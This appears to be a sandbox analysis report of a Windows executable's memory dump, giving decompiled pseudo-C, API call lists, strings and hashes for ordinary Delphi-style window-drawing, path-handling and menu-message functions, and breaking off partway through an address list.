GetObjectA.GDI32(00000000,00000054,?), ref: 00428710 GetDC.USER32(00000000), ref: 00428721 CreateCompatibleDC.GDI32(00000000), ref: 00428732 CreateBitmap.GDI32(00000000,?,00000001,00000001,00000000), ref: 0042877E CreateCompatibleBitmap.GDI32(00000028,00000000,?), ref: 004287A2 SelectObject.GDI32(?,?), ref: 004289FF SelectPalette.GDI32(?,00000000,00000000), ref: 00428A3F RealizePalette.GDI32(?), ref: 00428A4B SetTextColor.GDI32(?,00000000), ref: 00428AB4 SetBkColor.GDI32(?,00000000), ref: 00428ACE SetDIBColorTable.GDI32(?,00000000,?,?,?,00000000,?,00000000,?,?,00000000,00000000,00428C5C,?,00000000,00428C7E), ref: 00428B16 FillRect.USER32 ref: 00428A9C Part of subcall function 00425400: GetSysColor.USER32(E8C38BD6), ref: 0042540A PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062), ref: 00428B38 CreateCompatibleDC.GDI32(00000028), ref: 00428B4B SelectObject.GDI32(?,00000000), ref: 00428B6E SelectPalette.GDI32(?,00000000,00000000), ref: 00428B8A RealizePalette.GDI32(?), ref: 00428B95 SetTextColor.GDI32(?,00000000), ref: 00428BB3 SetBkColor.GDI32(?,00000000), ref: 00428BCD BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00428BF5 SelectPalette.GDI32(?,00000000,000000FF), ref: 00428C07 SelectObject.GDI32(?,00000000), ref: 00428C11 DeleteDC.GDI32(?), ref: 00428C2C Part of subcall function 004261BC: CreateBrushIndirect.GDI32(?), ref: 00426267

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapRealizeText$BrushDeleteFillIndirectRectTable String ID: API String ID: 1299887459-0 Opcode ID: 2bdc4c12e107cc10b8fc08af10309e4e60e6e52fb233a139e0a985037b79f6f3 Instruction ID: c94ec9aa21864ceb033ab26dba9ef5c179889cf4e7f392713ca4c39ad77ba447 Opcode Fuzzy Hash: 2bdc4c12e107cc10b8fc08af10309e4e60e6e52fb233a139e0a985037b79f6f3 Instruction Fuzzy Hash: 8C12DB71B01218AFDB10EF99D985F9E77B8EB08314F51845AF914EB291C778ED80CB68

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 84%

E00452B78(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) { intOrPtr* _v8; char _v12; intOrPtr _t157; intOrPtr _t161; intOrPtr _t163; intOrPtr _t164; intOrPtr _t165; intOrPtr _t169; intOrPtr _t174; intOrPtr _t176; intOrPtr _t177; void* _t179; struct HWND__* _t180; long _t190; long _t241; intOrPtr _t247; int _t252; intOrPtr _t253; intOrPtr _t266; intOrPtr _t270; signed int _t276; intOrPtr _t277; intOrPtr _t290; intOrPtr _t294; intOrPtr _t298; intOrPtr _t299; void* _t307; void* _t309; intOrPtr _t316; signed int _t326; signed int _t327; void* _t329; long _t333; intOrPtr _t337; struct HWND__* _t342; signed int _t344; signed int _t345; signed int _t348; signed int _t350; long _t351; signed int _t354; signed int _t356; signed int _t357; void* _t359; intOrPtr _t373; signed int _t389; signed int _t390; intOrPtr _t391; signed int _t400; signed int _t401; signed int _t403; signed int _t405; long _t406; signed int _t408; long _t409; signed int _t411; signed int _t412; void* _t414; void* _t415; intOrPtr _t416; _t414 = _t415; _t416 = _t415 + 0xfffffff8; _v12 = 0; _v8 = __eax; _push(_t414); _push(0x453183); _push( *[fs:eax]); *[fs:eax] = _t416; if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x358) & 0x00000004) != 0) { _t337 = *0x462f24; // 0x423578 E00406740(_t337, &_v12); E0040C11C(_v12, 1); E00404184(); } _t157 = *0x466580; // 0x26df470 E00457AB0(_t157); *(_v8 + 0x358) = *(_v8 + 0x358) | 0x00000004; _push(_t414); _push(0x453166); _push( *[fs:edx]); *[fs:edx] = _t416; if(( *(_v8 + 0x1c) & 0x00000010) != 0) { _t161 = _v8; __eflags = *(_t161 + 0x1c) & 0x00000010; if(( *(_t161 + 0x1c) & 0x00000010) != 0) { _t164 = _v8; __eflags = *(_t164 + 0x30); if( *(_t164 + 0x30) != 0) { _t165 = _v8; __eflags = *((char*)(_t165 + 0x1da)); if( *((char*)(_t165 + 0x1da)) != 0) { ShowWindow(E004423F8(_v8), 1); } } } L82: _pop(_t373); *[fs:eax] = _t373; _push(0x45316d); _t163 = _v8; *(_t163 + 0x358) = *(_t163 + 0x358) & 0x000000fb; return _t163; } _t169 = _v8; _t420 = *((char*)(_t169 + 0x1da)); if( *((char*)(_t169 + 0x1da)) == 0) { _push(_t414); _push(0x453037); _push( *[fs:eax]); *[fs:eax] = _t416; E00403B24(_v8, __eflags); *[fs:eax] = 0; _t174 = *0x466584; // 0x26e66a0 __eflags = *((intOrPtr*)(_t174 + 0x6c)) - _v8; if( *((intOrPtr*)(_t174 + 0x6c)) == _v8) { __eflags = 0; E00451B54(_v8, 0); } _t176 = _v8; __eflags = *((char*)(_t176 + 0x277)) - 1; if( *((char*)(_t176 + 0x277)) != 1) { _t177 = _v8; __eflags = *(_t177 + 0x358) & 0x00000008; if(( *(_t177 + 0x358) & 0x00000008) == 0) { _t342 = 0; _t179 = E004423F8(_v8); _t180 = GetActiveWindow(); __eflags = _t179 - _t180; if(_t179 == _t180) { _t190 = IsIconic(E004423F8(_v8)); __eflags = _t190; if(_t190 == 0) { _t342 = E0044CB68(E004423F8(_v8)); } } __eflags = _t342; if(_t342 == 0) { ShowWindow(E004423F8(_v8), 0); } else { SetWindowPos(E004423F8(_v8), 0, 0, 0, 0, 0, 0x97); SetActiveWindow(_t342); } } else { SetWindowPos(E004423F8(_v8), 0, 0, 0, 0, 0, 0x97); } } else { *((intOrPtr*)( *_v8 + 0xb0))(); } goto L82; } _push(_t414); _push(0x452c30); _push( *[fs:eax]); *[fs:eax] = _t416; E00403B24(_v8, _t420); *[fs:eax] = 0; if( *(_v8 + 0x278) == 4 || *(_v8 + 0x278) == 6 && *((char*)(_v8 + 0x277)) == 1) { if( *((char*)(_v8 + 0x277)) != 1) { _t344 = E00454604() - *(_v8 + 0x48); __eflags = _t344; _t345 = _t344 >> 1; if(_t344 < 0) { asm("adc ebx, 0x0"); } _t400 = E004545F8() - *(_v8 + 0x4c); __eflags = _t400; _t401 = _t400 >> 1; if(_t400 < 0) { asm("adc esi, 0x0"); } } else { _t266 = *0x466580; // 0x26df470 _t348 = E0043A398( *((intOrPtr*)(_t266 + 0x44))) - *(_v8 + 0x48); _t345 = _t348 >> 1; if(_t348 < 0) { asm("adc ebx, 0x0"); } _t270 = *0x466580; // 0x26df470 _t403 = E0043A3DC( *((intOrPtr*)(_t270 + 0x44))) - *(_v8 + 0x4c); _t401 = _t403 >> 1; if(_t403 < 0) { asm("adc esi, 0x0"); } } if(_t345 < E0045461C()) { _t345 = E0045461C(); } if(_t401 < E00454610()) { _t401 = E00454610(); } *((intOrPtr*)( *_v8 + 0x88))( *(_v8 + 0x4c), *(_v8 + 0x48)); if( *((char*)(_v8 + 0x57)) != 0) { E00450A44(_v8); } goto L59; } else { _t276 = *(_v8 + 0x278) & 0x000000ff; __eflags = _t276 + 0xfa - 2; if(_t276 + 0xfa - 2 >= 0) { __eflags = _t276 - 5; if(_t276 == 5) { _t277 = _v8; __eflags = *((char*)(_t277 + 0x277)) - 1; if( *((char*)(_t277 + 0x277)) != 1) { _t350 = E00454634() - *(_v8 + 0x48); __eflags = _t350; _t351 = _t350 >> 1; if(_t350 < 0) { asm("adc ebx, 0x0"); } _t405 = E00454628() - *(_v8 + 0x4c); __eflags = _t405; _t406 = _t405 >> 1; if(_t405 < 0) { asm("adc esi, 0x0"); } } else { _t290 = *0x466580; // 0x26df470 _t354 = E0043A398( *((intOrPtr*)(_t290 + 0x44))) - *(_v8 + 0x48); __eflags = _t354; _t351 = _t354 >> 1; if(_t354 < 0) { asm("adc ebx, 0x0"); } _t294 = *0x466580; // 0x26df470 _t408 = E0043A3DC( *((intOrPtr*)(_t294 + 0x44))) - *(_v8 + 0x4c); __eflags = _t408; _t406 = _t408 >> 1; if(_t408 < 0) { asm("adc esi, 0x0"); } } __eflags = _t351; if(_t351 < 0) { _t351 = 0; __eflags = 0; } __eflags = _t406; if(_t406 < 0) { _t406 = 0; __eflags = 0; } *((intOrPtr*)( *_v8 + 0x88))( *(_v8 + 0x4c), *(_v8 + 0x48)); } } else { _t298 = *0x466580; // 0x26df470 _t409 = *(_t298 + 0x44); _t299 = _v8; __eflags = *((char*)(_t299 + 0x278)) - 7; if( *((char*)(_t299 + 0x278)) == 7) { _t391 = *0x44b288; // 0x44b2d4 _t333 = E00403AB4( *(_v8 + 4), _t391); __eflags = _t333; if(_t333 != 0) { _t409 = *(_v8 + 4); } } __eflags = _t409; if(_t409 == 0) { _t356 = E00454604() - *(_v8 + 0x48); __eflags = _t356; _t357 = _t356 >> 1; if(_t356 < 0) { asm("adc ebx, 0x0"); } _t411 = E004545F8() - *(_v8 + 0x4c); __eflags = _t411; _t412 = _t411 >> 1; if(_t411 < 0) { asm("adc esi, 0x0"); } } else { _t359 = E0044ED88(_t409); _t326 = *((intOrPtr*)(_t409 + 0x48)) - *(_v8 + 0x48); __eflags = _t326; _t327 = _t326 >> 1; if(_t326 < 0) { asm("adc eax, 0x0"); } _t357 = _t359 + _t327; _t329 = E0044EDA8(_t409); _t389 = *((intOrPtr*)(_t409 + 0x4c)) - *(_v8 + 0x4c); __eflags = _t389; _t390 = _t389 >> 1; if(_t389 < 0) { asm("adc edx, 0x0"); } _t412 = _t329 + _t390; } _t307 = E0045461C(); __eflags = _t357 - _t307; if(_t357 < _t307) { _t357 = E0045461C(); } _t309 = E00454610(); __eflags = _t412 - _t309; if(_t412 < _t309) { _t412 = E00454610(); } *((intOrPtr*)( *_v8 + 0x88))( *(_v8 + 0x4c), *(_v8 + 0x48)); _t316 = _v8; __eflags = *((char*)(_t316 + 0x57)); if( *((char*)(_t316 + 0x57)) != 0) { E00450A44(_v8); } } L59: *(_v8 + 0x278) = 0; if( *((char*)(_v8 + 0x277)) != 1) { ShowWindow(E004423F8(_v8), *(0x462740 + ( *(_v8 + 0x273) & 0x000000ff) * 4)); } else { if( *(_v8 + 0x273) != 2) { ShowWindow(E004423F8(_v8), *(0x462740 + ( *(_v8 + 0x273) & 0x000000ff) * 4)); _t241 = *(_v8 + 0x48) | *(_v8 + 0x4c) << 0x00000010; __eflags = _t241; CallWindowProcA(0x406e4c, E004423F8(_v8), 5, 0, _t241); E0043AC50(_v8); } else { _t252 = E004423F8(_v8); _t253 = *0x466580; // 0x26df470 SendMessageA( *( *((intOrPtr*)(_t253 + 0x44)) + 0x29c), 0x223, _t252, 0); ShowWindow(E004423F8(_v8), 3); } _t247 = *0x466580; // 0x26df470 SendMessageA( *( *((intOrPtr*)(_t247 + 0x44)) + 0x29c), 0x234, 0, 0); } goto L82; } } 0x00452b79 0x00452b7b 0x00452b83 0x00452b86 0x00452b8b 0x00452b8c 0x00452b91 0x00452b94 0x00452b9e 0x00452baf 0x00452bb4 0x00452bc3 0x00452bc8 0x00452bc8 0x00452bcd 0x00452bd2 0x00452bda 0x00452be3 0x00452be4 0x00452be9 0x00452bec 0x00452bf6 0x00453120 0x00453123 0x00453127 0x00453129 0x0045312c 0x00453130 0x00453132 0x00453135 0x0045313c 0x00453149 0x00453149 0x0045313c 0x00453130 0x0045314e 0x00453150 0x00453153 0x00453156 0x0045315b 0x0045315e 0x00453165 0x00453165 0x00452bfc 0x00452bff 0x00452c06 0x00453015 0x00453016 0x0045301b 0x0045301e 0x00453028 0x00453032 0x0045304e 0x00453056 0x00453059 0x0045305b 0x00453060 0x00453060 0x00453065 0x00453068 0x0045306f 0x00453081 0x00453084 0x0045308b 0x004530af 0x004530b4 0x004530bb 0x004530c0 0x004530c2 0x004530cd 0x004530d2 0x004530d4 0x004530e3 0x004530e3 0x004530d4 0x004530e5 0x004530e7 0x00453119 0x004530e9 0x00453101 0x00453107 0x00453107 0x0045308d 0x004530a5 0x004530a5 0x00453071 0x00453076 0x00453076 0x00000000 0x0045306f 0x00452c0e 0x00452c0f 0x00452c14 0x00452c17 0x00452c21 0x00452c2b 0x00452c51 0x00452c7d 0x00452cc8 0x00452cc8 0x00452ccb 0x00452ccd 0x00452ccf 0x00452ccf 0x00452ce1 0x00452ce1 0x00452ce4 0x00452ce6 0x00452ce8 0x00452ce8 0x00452c7f 0x00452c7f 0x00452c91 0x00452c94 0x00452c96 0x00452c98 0x00452c98 0x00452c9b 0x00452cad 0x00452cb0 0x00452cb2 0x00452cb4 0x00452cb4 0x00452cb2 0x00452cf7 0x00452d03 0x00452d03 0x00452d11 0x00452d1d 0x00452d1d 0x00452d36 0x00452d43 0x00452d4c 0x00452d4c 0x00000000 0x00452d56 0x00452d59 0x00452d65 0x00452d68 0x00452e76 0x00452e78 0x00452e7e 0x00452e81 0x00452e88 0x00452ed3 0x00452ed3 0x00452ed6 0x00452ed8 0x00452eda 0x00452eda 0x00452eec 0x00452eec 0x00452eef 0x00452ef1 0x00452ef3 0x00452ef3 0x00452e8a 0x00452e8a 0x00452e9c 0x00452e9c 0x00452e9f 0x00452ea1 0x00452ea3 0x00452ea3 0x00452ea6 0x00452eb8 0x00452eb8 0x00452ebb 0x00452ebd 0x00452ebf 0x00452ebf 0x00452ebd 0x00452ef6 0x00452ef8 0x00452efa 0x00452efa 0x00452efa 0x00452efc 0x00452efe 0x00452f00 0x00452f00 0x00452f00 0x00452f19 0x00452f19 0x00452d6e 0x00452d6e 0x00452d73 0x00452d76 0x00452d79 0x00452d80 0x00452d88 0x00452d8e 0x00452d93 0x00452d95 0x00452d9a 0x00452d9a 0x00452d95 0x00452d9d 0x00452d9f 0x00452de8 0x00452de8 0x00452deb 0x00452ded 0x00452def 0x00452def 0x00452e01 0x00452e01 0x00452e04 0x00452e06 0x00452e08 0x00452e08 0x00452da1 0x00452da8 0x00452db0 0x00452db0 0x00452db3 0x00452db5 0x00452db7 0x00452db7 0x00452dba 0x00452dbe 0x00452dc9 0x00452dc9 0x00452dcc 0x00452dce 0x00452dd0 0x00452dd0 0x00452dd5 0x00452dd5 0x00452e10 0x00452e15 0x00452e17 0x00452e23 0x00452e23 0x00452e2a 0x00452e2f 0x00452e31 0x00452e3d 0x00452e3d 0x00452e56 0x00452e5c 0x00452e5f 0x00452e63 0x00452e6c 0x00452e6c 0x00452e63 0x00452f1f 0x00452f22 0x00452f33 0x00453009 0x00452f39 0x00452f43 0x00452f96 0x00452faa 0x00452faa 0x00452fbf 0x00452fc7 0x00452f45 0x00452f4a 0x00452f55 0x00452f64 0x00452f74 0x00452f74 0x00452fd5 0x00452fe4 0x00452fe4 0x00000000 0x00452f33

Strings

x5B , xrefs: 00452BAF

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: LoadString String ID: x5B API String ID: 2948472770-2671772400 Opcode ID: b6cab51178b630a4eb60dbe479c4b7adbb6bf75e1f0d25b5798c259387243a29 Instruction ID: fdf0033afcd44717c8607ee86a32dba8197f5f55c0a5171d2b836c552c812610 Opcode Fuzzy Hash: b6cab51178b630a4eb60dbe479c4b7adbb6bf75e1f0d25b5798c259387243a29 Instruction Fuzzy Hash: E6026F31A00204EFDB10DF69DA86B9D77F4AB05305F1504AAFD04EB3A3D7B8AE449B49

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 83%

E00405CBC(CHAR* __eax, int __edx) { CHAR* _v8; int _v12; CHAR* _v16; void* _v20; struct _WIN32_FIND_DATAA _v338; char _v599; void* _t102; intOrPtr* _t103; CHAR* _t106; CHAR* _t108; char* _t109; void* _t110; _v12 = __edx; _v8 = __eax; _v16 = _v8; _v20 = GetModuleHandleA("kernel32.dll"); if(_v20 == 0) { L4: if( *_v8 != 0x5c) { _t108 = &(_v8[2]); goto L10; } else { if(_v8[1] == 0x5c) { _t109 = E00405C9C( &(_v8[2])); if( *_t109 != 0) { _t17 = _t109 + 1; // 0x1 _t108 = E00405C9C(_t17); if( *_t108 != 0) { L10: _t102 = _t108 - _v8; lstrcpynA( &_v599, _v8, _t102 + 1); while( *_t108 != 0) { _t106 = E00405C9C( &(_t108[1])); if(_t106 - _t108 + _t102 + 1 <= 0x105) { lstrcpynA( &(( &_v599)[_t102]), _t108, _t106 - _t108 + 1); _v20 = FindFirstFileA( &_v599, &_v338); if(_v20 != 0xffffffff) { FindClose(_v20); if(lstrlenA( &(_v338.cFileName)) + _t102 + 1 + 1 <= 0x105) { *((char*)(_t110 + _t102 - 0x253)) = 0x5c; lstrcpynA( &(( &(( &_v599)[_t102]))[1]), &(_v338.cFileName), 0x105 - _t102 - 1); _t102 = _t102 + lstrlenA( &(_v338.cFileName)) + 1; _t108 = _t106; continue; } } } goto L17; } lstrcpynA(_v8, &_v599, _v12); } } } } } else { _t103 = GetProcAddress(_v20, "GetLongPathNameA"); if(_t103 == 0) { goto L4; } else { _push(0x105); _push( &_v599); _push(_v8); if( *_t103() == 0) { goto L4; } else { lstrcpynA(_v8, &_v599, _v12); } } } L17: return _v16; } 0x00405cc8 0x00405ccb 0x00405cd1 0x00405cde 0x00405ce5 0x00405d2a 0x00405d30 0x00405d6d 0x00000000 0x00405d32 0x00405d39 0x00405d4a 0x00405d4f 0x00405d55 0x00405d5d 0x00405d62 0x00405d70 0x00405d72 0x00405d84 0x00405e35 0x00405d96 0x00405da4 0x00405dba 0x00405dd2 0x00405dd9 0x00405ddf 0x00405dfb 0x00405dfd 0x00405e1f 0x00405e31 0x00405e33 0x00000000 0x00405e33 0x00405dfb 0x00405dd9 0x00000000 0x00405da4 0x00405e4d 0x00405e4d 0x00405d62 0x00405d4f 0x00405d39 0x00405ce7 0x00405cf5 0x00405cf9 0x00000000 0x00405cfb 0x00405cfb 0x00405d06 0x00405d0a 0x00405d0f 0x00000000 0x00405d11 0x00405d20 0x00405d20 0x00405d0f 0x00405cf9 0x00405e52 0x00405e5b

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,00400000,00461790), ref: 00405CD9 GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 00405CF0 lstrcpynA.KERNEL32(?,?,?), ref: 00405D20 lstrcpynA.KERNEL32(?,?,?,kernel32.dll,?,00400000,00461790), ref: 00405D84 lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00400000,00461790), ref: 00405DBA FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00400000,00461790), ref: 00405DCD FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00400000,00461790), ref: 00405DDF lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00400000,00461790), ref: 00405DEB lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00400000), ref: 00405E1F lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?), ref: 00405E2B lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 00405E4D

Strings

kernel32.dll , xrefs: 00405CD4 GetLongPathNameA , xrefs: 00405CE7 \ , xrefs: 00405DFD

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc String ID: GetLongPathNameA$\$kernel32.dll API String ID: 3245196872-1565342463 Opcode ID: 4c9fd7f5c89b396a6d77d29f335b003aeb63b386fe31a806673f744a8a1e1af7 Instruction ID: ed9b063c7604b8117c629610380ef8646edce7950b787036461636691dd4187e Opcode Fuzzy Hash: 4c9fd7f5c89b396a6d77d29f335b003aeb63b386fe31a806673f744a8a1e1af7 Instruction Fuzzy Hash: AF415171900658ABDB10EBE8CC89ADFB3ACEF04304F1444BBA558F7281D6789F408F58

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 92%

E004342B4(intOrPtr __eax, void* __ebx, int* __edx, void* __edi, void* __esi) { intOrPtr _v8; struct HMENU__* _v12; signed int _v16; signed int _v17; intOrPtr _v24; int _v28; struct HDC__* _v32; intOrPtr _v36; intOrPtr _v40; intOrPtr _v44; intOrPtr* _v48; char _v52; intOrPtr _t137; signed int _t138; signed int _t151; signed int _t152; intOrPtr* _t154; void* _t159; struct HMENU__* _t161; intOrPtr* _t166; void* _t174; signed int _t178; signed int _t182; void* _t183; void* _t215; void* _t253; signed int _t259; void* _t267; signed int _t273; signed int _t274; signed int _t276; signed int _t277; signed int _t279; signed int _t280; signed int _t282; signed int _t283; signed int _t285; signed int _t286; signed int _t288; signed int _t289; signed int _t292; signed int _t293; intOrPtr _t313; intOrPtr _t335; intOrPtr _t344; intOrPtr _t348; intOrPtr* _t355; signed int _t357; intOrPtr* _t358; signed int _t369; signed int _t370; signed int _t371; signed int _t372; signed int _t373; signed int _t374; signed int _t375; int* _t377; void* _t379; void* _t380; intOrPtr _t381; void* _t382; _t379 = _t380; _t381 = _t380 + 0xffffffd0; _v52 = 0; _t377 = __edx; _v8 = __eax; _push(_t379); _push(0x4347e8); _push( *[fs:eax]); *[fs:eax] = _t381; _t137 = *((intOrPtr*)(__edx)); _t382 = _t137 - 0x111; if(_t382 > 0) { _t138 = _t137 - 0x117; __eflags = _t138; if(_t138 == 0) { _t273 = *((intOrPtr*)(_v8 + 8)) - 1; __eflags = _t273; if(_t273 < 0) { goto L67; } else { _t274 = _t273 + 1; _t369 = 0; __eflags = 0; while(1) { _t151 = E004333E0(E0041A80C(_v8, _t369), _t377[1], __eflags); __eflags = _t151; if(_t151 != 0) { goto L68; } _t369 = _t369 + 1; _t274 = _t274 - 1; __eflags = _t274; if(_t274 != 0) { continue; } else { goto L67; } goto L68; } } } else { _t152 = _t138 - 8; __eflags = _t152; if(_t152 == 0) { _v17 = 0; __eflags = *(__edx + 6) & 0x00000010; if(( *(__edx + 6) & 0x00000010) != 0) { _v17 = 1; } _t276 = *((intOrPtr*)(_v8 + 8)) - 1; __eflags = _t276; if(__eflags < 0) { L32: _t154 = *0x462da4; // 0x466580 E004579C0( *_t154, 0, __eflags); goto L67; } else { _t277 = _t276 + 1; _t370 = 0; __eflags = 0; while(1) { __eflags = _v17 - 1; if(_v17 != 1) { _v12 = _t377[1] & 0x0000ffff; } else { _t161 = _t377[2]; __eflags = _t161; if(_t161 == 0) { _v12 = 0xffffffff; } else { _v12 = GetSubMenu(_t161, _t377[1] & 0x0000ffff); } } _t159 = E0041A80C(_v8, _t370); _t297 = _v17 & 0x000000ff; _v16 = E00433324(_t159, _v17 & 0x000000ff, _v12); __eflags = _v16; if(__eflags != 0) { break; } _t370 = _t370 + 1; _t277 = _t277 - 1; __eflags = _t277; if(__eflags != 0) { continue; } else { goto L32; } goto L68; } E00437730( *((intOrPtr*)(_v16 + 0x58)), _t297, &_v52, __eflags); _t166 = *0x462da4; // 0x466580 E004579C0( *_t166, _v52, __eflags); } } else { __eflags = _t152 == 1; if(_t152 == 1) { _t279 = *((intOrPtr*)(_v8 + 8)) - 1; __eflags = _t279; if(_t279 < 0) { goto L67; } else { _t280 = _t279 + 1; _t371 = 0; __eflags = 0; while(1) { _v48 = E0041A80C(_v8, _t371); _t174 = *((intOrPtr*)( *_v48 + 0x34))(); __eflags = _t174 - _t377[2]; if(_t174 == _t377[2]) { break; } _t178 = E00433324(_v48, 1, _t377[2]); __eflags = _t178; if(_t178 == 0) { _t371 = _t371 + 1; _t280 = _t280 - 1; __eflags = _t280; if(_t280 != 0) { continue; } else { goto L67; } } else { break; } goto L68; } L00433E94(_v48, _t377); } } else { goto L67; } } } goto L68; } else { if(_t382 == 0) { _t282 = *((intOrPtr*)(_v8 + 8)) - 1; __eflags = _t282; if(_t282 < 0) { goto L67; } else { _t283 = _t282 + 1; _t372 = 0; __eflags = 0; while(1) { E0041A80C(_v8, _t372); _t182 = E004333C4(_t377[1] & 0x0000ffff, __eflags); __eflags = _t182; if(_t182 != 0) { goto L68; } _t372 = _t372 + 1; _t283 = _t283 - 1; __eflags = _t283; if(_t283 != 0) { continue; } else { goto L67; } goto L68; } } goto L68; } else { _t183 = _t137 - 0x2b; if(_t183 == 0) { _v40 = *((intOrPtr*)(__edx + 8)); _t285 = *((intOrPtr*)(_v8 + 8)) - 1; __eflags = _t285; if(_t285 < 0) { goto L67; } else { _t286 = _t285 + 1; _t373 = 0; __eflags = 0; while(1) { _v16 = E00433324(E0041A80C(_v8, _t373), 0, *((intOrPtr*)(_v40 + 8))); __eflags = _v16; if(_v16 != 0) { break; } _t373 = _t373 + 1; _t286 = _t286 - 1; __eflags = _t286; if(_t286 != 0) { continue; } else { goto L67; } goto L69; } _v24 = E004262D8(0, 1); _push(_t379); _push(0x43461b); _push( *[fs:eax]); *[fs:eax] = _t381; _v28 = SaveDC( *(_v40 + 0x18)); _push(_t379); _push(0x4345fe); _push( *[fs:eax]); *[fs:eax] = _t381; E004268A4(_v24, *(_v40 + 0x18)); E00426738(_v24); E00434AAC(_v16, _v40 + 0x1c, _v24, *(_v40 + 0x10) & 0x0000ffff); _pop(_t335); *[fs:eax] = _t335; _push(0x434605); __eflags = 0; E004268A4(_v24, 0); return RestoreDC( *(_v40 + 0x18), _v28); } } else { _t215 = _t183 - 1; if(_t215 == 0) { _v44 = *((intOrPtr*)(__edx + 8)); _t288 = *((intOrPtr*)(_v8 + 8)) - 1; __eflags = _t288; if(_t288 < 0) { goto L67; } else { _t289 = _t288 + 1; _t374 = 0; __eflags = 0; while(1) { _v16 = E00433324(E0041A80C(_v8, _t374), 0, *((intOrPtr*)(_v44 + 8))); __eflags = _v16; if(_v16 != 0) { break; } _t374 = _t374 + 1; _t289 = _t289 - 1; __eflags = _t289; if(_t289 != 0) { continue; } else { goto L67; } goto L69; } _v32 = GetWindowDC( *(_v8 + 0x10)); *[fs:eax] = _t381; _v24 = E004262D8(0, 1); *[fs:eax] = _t381; _v28 = SaveDC(_v32); *[fs:eax] = _t381; E004268A4(_v24, _v32); E00426738(_v24); *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10, *[fs:eax], 0x43471c, _t379, *[fs:eax], 0x434739, _t379, *[fs:eax], 0x43475e, _t379); _pop(_t344); *[fs:eax] = _t344; _push(0x434723); __eflags = 0; E004268A4(_v24, 0); return RestoreDC(_v32, _v28); } } else { if(_t215 == 0x27) { _v36 = *((intOrPtr*)(__edx + 8)); _t292 = *((intOrPtr*)(_v8 + 8)) - 1; __eflags = _t292; if(_t292 < 0) { goto L67; } else { _t293 = _t292 + 1; _t375 = 0; __eflags = 0; while(1) { _t253 = *((intOrPtr*)( *((intOrPtr*)(E0041A80C(_v8, _t375))) + 0x34))(); _t348 = _v36; __eflags = _t253 - *((intOrPtr*)(_t348 + 0xc)); if(_t253 != *((intOrPtr*)(_t348 + 0xc))) { _v16 = E00433324(E0041A80C(_v8, _t375), 1, *((intOrPtr*)(_v36 + 0xc))); } else { _v16 = *((intOrPtr*)(E0041A80C(_v8, _t375) + 0x34)); } __eflags = _v16; if(_v16 != 0) { break; } _t375 = _t375 + 1; _t293 = _t293 - 1; __eflags = _t293; if(_t293 != 0) { continue; } else { goto L67; } goto L68; } _t259 = E00433354(E0041A80C(_v8, _t375), 1, *((intOrPtr*)(_v36 + 8))); __eflags = _t259; if(_t259 == 0) { _t267 = E0041A80C(_v8, _t375); __eflags = 0; _t259 = E00433354(_t267, 0, *((intOrPtr*)(_v36 + 0xc))); } _t355 = *0x462f14; // 0x466584 _t357 = *( *_t355 + 0x6c); __eflags = _t357; if(_t357 != 0) { __eflags = _t259; if(_t259 == 0) { _t259 = *(_t357 + 0x160); } __eflags = *(_t357 + 0x270) & 0x00000008; if(( *(_t357 + 0x270) & 0x00000008) == 0) { _t358 = *0x462da4; // 0x466580 E004575F4( *_t358, _t293, _t259, _t375, _t377); } else { E0045767C(); } } } } else { L67: _t377[3] = DefWindowProcA( *(_v8 + 0x10), *_t377, _t377[1], _t377[2]); } L68: _pop(_t313); *[fs:eax] = _t313; _push(0x4347ef); return E0040473C( &_v52); } } } } L69: } 0x004342b5 0x004342b7 0x004342bf 0x004342c2 0x004342c4 0x004342c9 0x004342ca 0x004342cf 0x004342d2 0x004342d5 0x004342d7 0x004342dc 0x004342fe 0x004342fe 0x00434303 0x00434352 0x00434353 0x00434355 0x00000000 0x0043435b 0x0043435b 0x0043435c 0x0043435c 0x0043435e 0x0043436b 0x00434370 0x00434372 0x00000000 0x00000000 0x00434378 0x00434379 0x00434379 0x0043437a 0x00000000 0x0043437c 0x00000000 